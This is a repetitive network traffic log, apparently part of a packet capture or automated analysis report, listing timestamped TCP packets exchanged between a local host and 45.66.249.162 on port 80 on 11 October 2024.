                                                                                                                                                              Oct 11, 2024 22:32:38.620048046 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.620057106 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.620070934 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.620079041 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.620079994 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.620099068 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.620110989 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.620121002 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.620125055 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.620135069 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.620152950 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.620162010 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.620181084 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.620182991 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.620201111 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.620215893 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.620218992 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.620229006 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.620240927 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.620251894 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.620259047 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.620268106 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.620280027 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.620299101 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.620301962 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.620322943 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.620326996 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.620337009 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.620347023 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.620366096 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.620373964 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.620383024 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.620398998 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.620403051 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.620415926 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.620436907 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.620439053 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.620455027 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.620466948 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.620472908 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.620486975 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.620495081 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.620507956 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.620517015 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.620522022 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.620539904 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.620547056 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.620553970 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.620567083 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.620577097 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.620587111 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.620598078 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.620606899 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.620619059 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.620628119 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.620632887 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.620647907 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.620659113 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.620668888 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.620681047 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.620693922 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.777414083 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.777477026 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.777487993 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.777498007 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.777519941 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.777523041 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.777529955 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.777544022 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.777559042 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.777568102 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.777573109 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.777590036 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.777601957 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.777614117 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.777621031 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.777635098 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.777647972 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.777648926 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.777657032 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.777663946 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.777669907 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.777677059 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.777683973 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.777688980 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.777796030 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.778073072 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.778086901 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.778111935 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.778117895 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.778129101 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.778132915 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.778157949 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.778172970 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.778270960 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.778307915 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.778345108 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.778363943 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.778379917 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.778384924 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.778397083 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.778412104 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.778425932 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.778481007 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.778497934 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.778520107 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.778526068 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.778539896 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.778543949 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.778558016 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.778561115 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.778575897 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.778584957 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.778592110 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.778605938 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.778621912 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.778624058 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.778641939 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.778649092 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.778662920 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.778665066 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.778680086 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.778697968 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.778841019 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.778862000 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.778879881 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.778892994 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.778989077 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.779002905 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.779031038 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.779046059 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.779548883 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.779568911 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.779597044 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.779603004 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.779617071 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.779617071 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.779640913 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.779644012 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.779658079 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.779675007 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.779680014 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.779697895 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.779701948 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.779717922 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.779736996 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.779987097 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.780005932 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.780038118 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.780049086 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.780133963 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.780148029 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.780173063 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.780179024 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.780196905 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.780196905 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.780213118 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.780219078 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.780234098 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.780239105 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.780249119 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.780258894 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.780275106 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.780280113 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.780286074 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.780303001 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.780309916 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.780319929 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.780333042 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.780348063 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.780514002 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.780550957 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.780842066 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.780855894 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.780880928 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.780886889 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.780905008 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.780921936 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.780941010 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.780958891 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.780977011 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.780982018 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.780991077 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.781008005 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.781054974 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.781073093 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.781089067 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.781091928 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.781111002 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.781120062 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.781128883 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.781141043 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.781151056 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.781161070 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.781172991 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.781181097 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.781186104 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.781202078 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.781209946 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.781234026 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.781259060 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.781284094 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.781294107 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.781303883 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.781316996 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.781325102 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.781331062 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.781346083 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.781354904 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.781364918 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.781377077 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.781385899 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.781405926 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.781407118 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.781425953 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.781430006 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.781436920 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.781450987 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.781461000 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.781471014 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.781476974 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.781498909 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.781501055 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.781518936 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.781534910 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.781536102 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.781549931 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.781559944 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.781565905 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.781579971 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.781589985 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.781601906 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.781610012 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.781635046 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.781881094 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.781900883 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.781922102 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.781949043 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.781970024 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.781977892 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.781981945 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.782000065 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.782016993 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.782020092 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.782030106 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.782054901 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.782233953 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.782265902 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.782360077 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.782380104 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.782396078 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.782398939 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.782407999 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.782419920 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.782426119 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.782439947 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.782449007 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.782460928 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.782469034 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.782488108 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.782490969 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.782509089 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.782524109 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.782527924 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.782536030 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.782548904 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.782553911 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.782603025 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.782622099 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.782624960 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.782635927 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.782648087 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.782653093 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.782670021 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.782685041 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.782696009 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.918998957 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.919068098 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.919070005 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.919099092 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.919106960 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.919123888 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.919130087 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.919152021 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.919161081 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.919173956 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.919190884 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.919195890 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.919205904 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.919222116 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.919235945 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.919243097 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.919250011 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.919260025 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.919264078 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.919284105 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.919305086 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.919321060 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.919323921 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.919343948 CEST804970745.66.249.162192.168.2.8
